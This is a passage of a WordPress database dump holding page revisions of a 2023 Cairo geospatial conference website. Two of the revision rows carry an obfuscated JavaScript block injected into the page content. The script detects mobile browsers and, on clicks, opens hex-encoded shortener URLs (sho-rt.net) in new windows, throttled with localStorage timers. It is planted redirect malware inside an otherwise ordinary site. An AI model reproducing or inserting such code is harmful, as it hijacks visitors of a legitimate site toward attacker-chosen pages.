_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 15:51:38','2022-11-09 15:51:38','',3066,'https://gsw2023.com/?p=3149',0,'revision','',0),
(3150,1,'2022-11-09 15:53:23','2022-11-09 15:53:23','<p>[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668005485706{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]</p>\n<h3>EGYPT GSW\'2023</h3>\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668005400977{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668005634121{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa</p>\n<p>aaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa</p>\n<p>aaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa</p>\n<p>aaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa</p>\n<p>aaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668008877776{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 15:53:23','2022-11-09 15:53:23','',3066,'https://gsw2023.com/?p=3150',0,'revision','',0),
(3151,1,'2022-11-09 15:54:21','2022-11-09 15:54:21','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668005485706{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h3>EGYPT GSW\'2023</h3>\r\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668005400977{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668005634121{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668008877776{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: 